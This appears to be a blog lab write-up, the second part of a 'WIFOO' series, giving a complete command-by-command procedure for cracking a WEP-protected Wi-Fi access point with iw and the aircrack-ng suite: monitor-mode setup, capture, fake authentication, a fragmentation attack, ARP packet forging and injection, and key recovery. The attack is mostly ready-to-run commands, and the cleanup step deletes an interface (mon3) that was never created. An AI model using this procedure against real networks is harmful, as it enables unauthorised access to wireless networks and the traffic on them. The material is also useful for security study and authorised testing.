WIFOO Revisited – Part 2 – WEP

Part 1

  1. Create the wireless monitor interface(s).
 sudo iw wlan1 interface add mon0 type monitor
 sudo iw wlan1 interface add mon1 type monitor
 sudo iw wlan1 interface add mon2 type monitor

2. Recon and gather info using any of the monitor mode interfaces.

sudo airodump-ng --band abg mon0

Take note of the BSSID, channel, encryption, Cipher, and ESSID.

Once the BSSID/ESSID is obtained, execute a filtered capture on the target network.

$ sudo airodump-ng --channel 11 --bssid 20:AA:4B:4A:93:F7 -w WIFOO-ATTACK-2 mon0 --ignore-negative-one

3. Document the BSSID of the AP, the channel, and the MAC address of the monitor mode interface.

 echo victim 20:AA:4B:4A:93:F7 > attackinfo
 echo channel 11 >> attackinfo
 echo mon0 00-C0-CA-88-8B-69 >> attackinfo

4. Initiate a “fake” authentication with the access point using aireplay-ng.

sudo aireplay-ng --fakeauth 60 -a 20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one

Executing the command will cause the monitor mode interface to associate with the AP.

Inspection of the airodump-ng capture shows that the AP accepted the association.

For the WEP attack to work, the association must be valid. The previously executed command will maintain a continuous connection.


5. Execute the fragmentation attack using aireplay. Reference: https://www.aircrack-ng.org/doku.php?id=fragmentation

aireplay-ng --fragment -b  20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one

6. Generate an arp packet using packetforge-ng via the .xor file. This file will be used to inject packets into the network.

The goal of the injection is to increase the data going to the AP quickly. But unfortunately, there are only 300+ data frames, which is insufficient to crack WEP.

└─$ sudo packetforge-ng -0 -a 20:AA:4B:4A:93:F7 -h 00-C0-CA-88-8B-69 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0316-175707.xor -w clientlessinject

7. Next, inject the packet into the network using aireplay-ng with the interactive option. This should cause the AP to generate weak IVs.

└─$ sudo aireplay-ng --interactive -r clientlessinject mon0

The AP should now generate large amounts of IVs which can be used to crack WEP.

8. With 10,000 IVs collected, it’s time to try cracking the key using the .cap file that is being logged. Run the crack with injection running. The more frames, the better.

sudo aircrack-ng -0  WIFOO-ATTACK-2-01.cap

The key length shouldn’t matter once many IVs are collected.


Delete the monitor mode interfaces.

 sudo iw dev mon0 del
 sudo iw dev mon2 del
 sudo iw dev mon1 del
 sudo iw dev mon3 del

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.